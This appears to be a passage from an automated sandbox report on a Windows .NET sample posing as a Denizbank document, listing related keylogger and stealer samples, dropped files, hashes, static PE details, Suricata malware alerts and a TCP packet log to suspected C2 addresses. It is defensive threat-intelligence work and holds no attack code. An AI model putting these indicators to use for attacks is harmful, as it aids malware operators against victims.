	ZEcVl5jzXD.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.6.168
	powerpc.nn.elf	Get hash	malicious	Mirai, Okiru	Browse	168.139.6.21
	rrequestforquotation.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	SOA SEP 2024.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	193.122.130.0
	arm5.nn-20241122-0008.elf	Get hash	malicious	Mirai, Okiru	Browse	147.154.211.97

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	Ziraat_Bankasi_Swift_Mesaji_BXB04958T.scr.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
	VSP469620.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	order requirements CIF-TRC809910645210.exe	Get hash	malicious	MassLogger RAT	Browse	104.21.67.152
	IMG-20241119-WA0006(162KB).Pdf.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
	NEW P.O.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	104.21.67.152
	MC8017774DOCS.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	Pigroots.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	Shave.exe	Get hash	malicious	GuLoader, Snake Keylogger, VIP Keylogger	Browse	104.21.67.152
	New shipment AWB NO - 09804480383.exe	Get hash	malicious	PureLog Stealer, Snake Keylogger	Browse	104.21.67.152
	rorderrequirementsCIF-TRC809910645210.exe	Get hash	malicious	Snake Keylogger	Browse	104.21.67.152
3b5074b1b5d032e5620f69f9f700ff0e	lcc333.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	lcc333.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://cgpsco.rahalat.net/conta	Get hash	malicious	Unknown	Browse	149.154.167.220
	https://google.lt/amp/taerendil.online.fr/gpfv9cqYcuejGaVElbEvNcI6wCkeo	Get hash	malicious	Unknown	Browse	149.154.167.220
	file.exe	Get hash	malicious	PureCrypter, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc, Vidar	Browse	149.154.167.220
	05.Unzipped.obfhotel22-11.js	Get hash	malicious	RHADAMANTHYS	Browse	149.154.167.220
	DATASHEET.pdf.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	412300061474#U00b7pdf.vbs	Get hash	malicious	Remcos, GuLoader	Browse	149.154.167.220
	order requirements CIF-TRC809910645210.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
	0a0#U00a0.js	Get hash	malicious	RHADAMANTHYS	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe
File Type:	Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
Category:	dropped
Size (bytes):	71954
Entropy (8bit):	7.996617769952133
Encrypted:	true
SSDEEP:	1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
MD5:	49AEBF8CBD62D92AC215B2923FB1B9F5
SHA1:	1723BE06719828DDA65AD804298D0431F6AFF976
SHA-256:	B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
SHA-512:	BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
Malicious:	false
Reputation:	high, very likely benign file
Preview:	MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..\|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........\|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.\|.c.&>?..^t. ..;..X.d.E.0G....[Q.,......#.Dp..L.o\|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...

C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

Download File

Process:	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe
File Type:	data
Category:	dropped
Size (bytes):	328
Entropy (8bit):	3.253995428229512
Encrypted:	false
SSDEEP:	6:kKWsL9UswD8HGsL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:udDImsLNkPlE99SNxAhUe/3
MD5:	CC69A6AB1A86CE5AFC34DD7DDE337B27
SHA1:	5459DE40BEA71C50C031A89D68980F26F4962B81
SHA-256:	9AF0A8B3A183A84E4932B4EC79385488A62EEB1C16A8496399F8B3BCDB9F8983
SHA-512:	C0841B1D7192507307D325D3297B6CDF9816910216F1D13DEE784FB9B7D08D7C045E3CDB587AFE4BE124973394246C5EC1B37A8ECB560FD9FECC13E1CF30A3D6
Malicious:	false
Reputation:	low
Preview:	p...... ..........LC....(....................................................... ........G..@.......&......X........h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\denizbank 25.11.2024 E80 aspc.exe.log

Download File

Process:	C:\Users\user\Desktop\denizbank 25.11.2024 E80 aspc.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.34331486778365
Encrypted:	false
SSDEEP:	24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
MD5:	1330C80CAAC9A0FB172F202485E9B1E8
SHA1:	86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
SHA-256:	B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
SHA-512:	75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
Malicious:	true
Reputation:	high, very likely benign file
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1172
Entropy (8bit):	5.354777075714867
Encrypted:	false
SSDEEP:	24:3gWSKco4KmZjKbm51s4RPT6moUebIKo+mZ9t7J0gt/NKIl9r+q:QWSU4xymI4RfoUeW+mZ9tK8ND3
MD5:	0CBD5C86CC1353C7EF09E2ED3E0829E3
SHA1:	0FFE29A715ED1E32BB9491D3DD88FB72280ED040
SHA-256:	B7A6D1B47CEA0A5084460775416103112E56A7A423216183ABAC974960FD51E7
SHA-512:	C60EC6550188DCCD1EAD93CC49011BAC45134426ADEF81410468A1F613AD8F2E67AEF296F5C92092A62BFAC746FCA9DC8741FEC5600996F28A48BF2488E94D40
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	@...e.................................,..............@..........P................1]...E...........(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..\|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...\|...........System.Configuration4.................%...K... ...........System.Xml..L.................gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5nk0uybc.sli.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fsjdu3er.vuh.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_puj3agw1.25q.psm1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tx2x2e5c.zxc.ps1

Download File

Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	ASCII text, with no line terminators
Category:	dropped
Size (bytes):	60
Entropy (8bit):	4.038920595031593
Encrypted:	false
SSDEEP:	3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:	D17FE0A3F47BE24A6453E9EF58C94641
SHA1:	6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:	5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:	false
Preview:	# PowerShell test file to determine AppLocker lockdown mode

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit):	7.933470350713601
TrID:	Win32 Executable (generic) Net Framework (10011505/4) 49.83% Win32 Executable (generic) a (10002005/4) 49.78% Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36% Generic Win/DOS Executable (2004/3) 0.01% DOS Executable Generic (2002/1) 0.01%
File name:	denizbank 25.11.2024 E80 aspc.exe
File size:	754'688 bytes
MD5:	99334c137b21036493a00305cd3189da
SHA1:	3f4e22efc054a79fe7f1644b564f7a78d438f497
SHA256:	4e3703fac7cd57231af4066573369bddffd7d7c0f8d0c4b2d0fc006c42b87dcc
SHA512:	b734366e0678853abdf0e4704abeb88a545156b210d2243f9019e2506f40e6ba640f74b069e1753305245bd1a7376ff9dff462661419a52100e0d1901c976406
SSDEEP:	12288:h15vH3RbeXyL05XULmZtHnZW11dSduUmDAqpNjm8M4FK/e3LsNejj1x9/:hnvH35eXNYulnZ6dSTmDQ8LE/APj1n
TLSH:	D0F4125137A84FA6D1BE03F52818928107FE61279276F3684F8B74DB5E53B13C922B1B
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....)...............0..j............... ........@.. ....................................@................................

File Icon


Icon Hash:	3c30585d07490101

Static PE Info

General

Entrypoint:	0x4b89da
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0xE3290D87 [Sun Oct 8 04:01:11 2090 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f34d5f2d4577ed6d9ceec516c1f5a744

Entrypoint Preview

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb8988	0x4f	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xba000	0x1518	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xbc000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0xb5f38	0x70	.text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xb69e0	0xb6a00	8b83edbda698cf9d1db11f31c2710e66	False	0.9500997283538672	data	7.944205970111451	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xba000	0x1518	0x1600	e0f8c00a025fa8089fb4f9f7db24c3cc	False	0.6207386363636364	data	5.803692896528983	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xbc000	0xc	0x200	7fd643080d77fb4ef48174e4c930360c	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	ZLIB Complexity
RT_ICON	0xba160	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors	0.7261560693641619
RT_ICON	0xba6c8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors	0.7919675090252708
RT_GROUP_ICON	0xbaf70	0x22	data	0.9411764705882353
RT_VERSION	0xbaf94	0x398	OpenPGP Public Key	0.4206521739130435
RT_MANIFEST	0xbb32c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators	0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-25T11:42:12.456350+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49733	193.122.130.0	80	TCP
2024-11-25T11:42:14.952601+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49733	193.122.130.0	80	TCP
2024-11-25T11:42:16.566587+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49737	104.21.67.152	443	TCP
2024-11-25T11:42:18.202678+0100	2803274	ETPRO MALWARE Common Downloader Header Pattern UH	2	192.168.2.4	49738	193.122.130.0	80	TCP
2024-11-25T11:42:25.881232+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49744	104.21.67.152	443	TCP
2024-11-25T11:42:28.875522+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49749	104.21.67.152	443	TCP
2024-11-25T11:42:31.906597+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49752	104.21.67.152	443	TCP
2024-11-25T11:42:34.996754+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49755	104.21.67.152	443	TCP
2024-11-25T11:42:37.932783+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.4	49757	104.21.67.152	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Nov 25, 2024 11:42:10.615417957 CET	49733	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:10.735215902 CET	80	49733	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:10.735332012 CET	49733	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:10.735654116 CET	49733	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:10.855345011 CET	80	49733	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:12.060579062 CET	80	49733	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:12.067420006 CET	49733	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:12.187163115 CET	80	49733	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:12.408212900 CET	80	49733	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:12.456350088 CET	49733	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:12.829483032 CET	49735	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:12.829514980 CET	443	49735	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:12.829603910 CET	49735	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:12.836705923 CET	49735	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:12.836721897 CET	443	49735	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:14.100894928 CET	443	49735	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:14.100975990 CET	49735	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:14.106874943 CET	49735	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:14.106889963 CET	443	49735	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:14.107239962 CET	443	49735	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:14.155729055 CET	49735	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:14.166812897 CET	49735	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:14.211328030 CET	443	49735	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:14.548660994 CET	443	49735	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:14.548733950 CET	443	49735	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:14.548809052 CET	49735	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:14.565152884 CET	49735	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:14.569813967 CET	49733	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:14.689268112 CET	80	49733	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:14.907397032 CET	80	49733	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:14.909810066 CET	49737	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:14.909837961 CET	443	49737	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:14.909914017 CET	49737	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:14.910501003 CET	49737	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:14.910511971 CET	443	49737	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:14.952600956 CET	49733	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:16.120651960 CET	443	49737	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:16.123146057 CET	49737	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:16.123183966 CET	443	49737	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:16.566603899 CET	443	49737	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:16.566674948 CET	443	49737	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:16.566745043 CET	49737	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:16.567307949 CET	49737	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:16.571216106 CET	49733	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:16.572694063 CET	49738	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:16.691873074 CET	80	49733	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:16.691936016 CET	49733	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:16.692333937 CET	80	49738	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:16.692445040 CET	49738	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:16.692667007 CET	49738	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:16.812424898 CET	80	49738	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:18.160442114 CET	80	49738	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:18.161992073 CET	49739	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:18.162044048 CET	443	49739	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:18.162122011 CET	49739	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:18.162427902 CET	49739	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:18.162442923 CET	443	49739	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:18.202677965 CET	49738	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:19.467963934 CET	443	49739	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:19.470175028 CET	49739	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:19.470221996 CET	443	49739	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:19.931045055 CET	443	49739	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:19.931111097 CET	443	49739	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:19.931162119 CET	49739	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:19.931684971 CET	49739	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:19.936686993 CET	49740	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:20.056318998 CET	80	49740	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:20.056459904 CET	49740	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:20.056668043 CET	49740	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:20.178659916 CET	80	49740	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:21.171308994 CET	80	49740	193.122.130.0	192.168.2.4
Nov 25, 2024 11:42:21.172854900 CET	49741	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:21.172893047 CET	443	49741	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:21.172972918 CET	49741	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:21.173269033 CET	49741	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:21.173284054 CET	443	49741	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:21.218307018 CET	49740	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:22.475629091 CET	443	49741	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:22.477577925 CET	49741	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:22.477605104 CET	443	49741	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:22.938445091 CET	443	49741	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:22.938524008 CET	443	49741	104.21.67.152	192.168.2.4
Nov 25, 2024 11:42:22.938568115 CET	49741	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:22.939486027 CET	49741	443	192.168.2.4	104.21.67.152
Nov 25, 2024 11:42:22.946377039 CET	49740	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:22.947484016 CET	49742	80	192.168.2.4	193.122.130.0
Nov 25, 2024 11:42:23.066315889 CET	80	49740	193.122.130.0	192.168.2.4
